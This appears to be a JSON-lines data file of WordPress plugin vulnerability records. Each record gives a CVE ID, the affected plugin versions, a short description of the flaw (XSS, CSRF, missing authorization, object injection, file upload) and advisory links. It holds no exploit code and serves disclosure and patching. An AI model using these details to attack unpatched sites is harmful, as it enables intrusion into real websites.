{"CVE_ID":"CVE-2023-0948","slug":"woocommerce-for-japan","versionEndExcluding":"2.5.8","description":"The Japanized For WooCommerce WordPress plugin before 2.5.8 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a78d75b2-85a0-41eb-9720-c726ca2e8718\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a78d75b2-85a0-41eb-9720-c726ca2e8718\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11326","slug":"campaign-monitor-wp","versionImpact":"2.5.7","versionEndExcluding":"2.5.8","description":"The Campaign Monitor Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198560\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198560\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ebb2ad-91a8-4a0d-ba91-f417943545b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ebb2ad-91a8-4a0d-ba91-f417943545b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11325","slug":"aweber-wp","versionImpact":"2.5.7","versionEndExcluding":"2.5.8","description":"The AWeber Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198559\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198559\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21c09207-38a1-47ae-ae1e-52f8eea4785d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21c09207-38a1-47ae-ae1e-52f8eea4785d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3178","slug":"post-smtp","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability delete arbitrary logs via a CSRF attack.","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5341cb5d-d204-49e1-b013-f8959461995f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5341cb5d-d204-49e1-b013-f8959461995f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25715","slug":"gamipress","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"Missing Authorization vulnerability in GamiPress GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress.This issue affects GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n\/a through 2.5.6.\n\n","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gamipress\\\/wordpress-gamipress-plugin-2-5-6-missing-authorization-leading-to-points-manipulation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gamipress\\\/wordpress-gamipress-plugin-2-5-6-missing-authorization-leading-to-points-manipulation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3179","slug":"post-smtp","versionEndExcluding":"2.5.7","description":"The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability resend an email to an arbitrary address (for example a password reset email could be resent to an attacker controlled email, and allow them to take over an account).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/542caa40-b199-4397-90bb-4fdb693ebb24\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/542caa40-b199-4397-90bb-4fdb693ebb24\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4004","slug":"advanced-cron-manager","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"The Advanced Cron Manager  WordPress plugin before 2.5.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e5e7040-b824-4af7-90a1-90801d12abb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e5e7040-b824-4af7-90a1-90801d12abb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"wp-coder","versionEndExcluding":"2.5.6","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5098","slug":"campaign-monitor-wp","versionImpact":"2.5.5","versionEndExcluding":"2.5.6","description":"The Campaign Monitor Forms by Optin Cat WordPress plugin before 2.5.6 does not prevent users with low privileges (like subscribers) from overwriting any options on a site with the string \"true\", which could lead to a variety of outcomes, including DoS.","recommendation":"Update to version 2.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3167a83c-291e-4372-a42e-d842205ba722\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3167a83c-291e-4372-a42e-d842205ba722\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4420","slug":"sell-media","versionEndExcluding":"2.5.6","description":"The Sell Media plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.5. This is due to missing or incorrect nonce validation on the sell_media_process() function. This makes it possible for unauthenticated attackers to sell media paypal orders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da4592b6-5e84-4a89-9ade-6cc227740d32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da4592b6-5e84-4a89-9ade-6cc227740d32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2603629%40sell-media&new=2603629%40sell-media&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2603629%40sell-media&new=2603629%40sell-media&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5173","slug":"ht-mega-for-elementor","versionImpact":"2.5.5","versionEndExcluding":"2.5.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.3\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.3\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L549\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5501","slug":"supreme-modules-for-divi","versionImpact":"2.5.51","versionEndExcluding":"2.5.52","description":"The Supreme Modules Lite \u2013 Divi Theme, Extra Theme and Divi Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_one_id\u2019 parameter in all versions up to, and including, 2.5.51 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543e6e2-e052-466e-ad19-656fd8d01805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543e6e2-e052-466e-ad19-656fd8d01805?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/Buttons\\\/Buttons.php#L1889\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/Buttons\\\/Buttons.php#L1889\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095671\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095671\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4334","slug":"supreme-modules-for-divi","versionImpact":"2.5.3","versionEndExcluding":"2.5.4","description":"The Supreme Modules Lite \u2013 Divi Theme, Extra Theme and Divi Builder plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the \u2018typing_cursor\u2019 parameter in versions up to, and including, 2.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17508063-3cd7-4b61-b7be-23a71b75f6a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17508063-3cd7-4b61-b7be-23a71b75f6a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/TypingEffect.php#L744\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/TypingEffect.php#L744\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/frontend.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/frontend.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file204\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0232","slug":"woolentor-addons","versionEndExcluding":"2.5.4","description":"The ShopLentor WordPress plugin before 2.5.4 unserializes user input from cookies in order to track viewed products and user data, which could lead to PHP Object Injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1885a708-0e8a-4f4c-8e26-069bebe9a518\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1885a708-0e8a-4f4c-8e26-069bebe9a518\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2852711\\\/woolentor-addons\\\/trunk\\\/includes\\\/helper-function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2852711\\\/woolentor-addons\\\/trunk\\\/includes\\\/helper-function.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0231","slug":"woolentor-addons","versionEndExcluding":"2.5.4","description":"The ShopLentor WordPress plugin before 2.5.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/533c19d5-219c-4389-a8bf-8b3a35b33b20\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/533c19d5-219c-4389-a8bf-8b3a35b33b20\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1762","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.5.3","versionEndExcluding":"2.5.4","description":"The Event Tickets with Ticket Scanner WordPress plugin before 2.5.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7721","slug":"html5-video-player","versionImpact":"2.5.34","versionEndExcluding":"2.5.35","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled.","recommendation":"Update to version 2.5.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148088\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7727","slug":"html5-video-player","versionImpact":"2.5.32","versionEndExcluding":"2.5.33","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data.","recommendation":"Update to version 2.5.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/908df18e-7178-4d40-becb-86e1a714a7da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/908df18e-7178-4d40-becb-86e1a714a7da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/ImportData.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/ImportData.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139559\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10138","slug":"work-the-flow-file-upload","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The Work The Flow File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jQuery-File-Upload-9.5.0 server and test files in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131294\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131294\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131512\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131512\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127456%40work-the-flow-file-upload&new=1127456%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127456%40work-the-flow-file-upload&new=1127456%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127457%40work-the-flow-file-upload&new=1127457%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127457%40work-the-flow-file-upload&new=1127457%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a49a81a9-3d4b-4c8d-b719-fc513aceecc6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a49a81a9-3d4b-4c8d-b719-fc513aceecc6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-work-the-flow-file-upload-arbitrary-file-upload-2-5-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-work-the-flow-file-upload-arbitrary-file-upload-2-5-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/04\\\/wordpress-work-the-flow-file-upload-vulnerability\\\/\",\"name\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/04\\\/wordpress-work-the-flow-file-upload-vulnerability\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/exploit\\\/unix\\\/webapp\\\/wp_worktheflow_upload\\\/\",\"name\":\"https:\\\/\\\/www.rapid7.com\\\/db\\\/modules\\\/exploit\\\/unix\\\/webapp\\\/wp_worktheflow_upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb271cc8-01ec-45eb-9d6f-efc55c7c3923?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb271cc8-01ec-45eb-9d6f-efc55c7c3923?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4876","slug":"ht-mega-for-elementor","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018popover_header_text\u2019 parameter in versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e104fa-591a-41e8-af7e-f8b32a199170?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e104fa-591a-41e8-af7e-f8b32a199170?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_popover.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.0\\\/includes\\\/widgets\\\/htmega_popover.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088899\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9663","slug":"cyan-backup","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The CYAN Backup WordPress plugin before 2.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dbd0927-f245-4202-b96b-e55f36a8bb30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dbd0927-f245-4202-b96b-e55f36a8bb30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9662","slug":"cyan-backup","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The CYAN Backup WordPress plugin before 2.5.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa6ff7d-c0dc-4118-afe0-587a24c76f12\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfa6ff7d-c0dc-4118-afe0-587a24c76f12\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
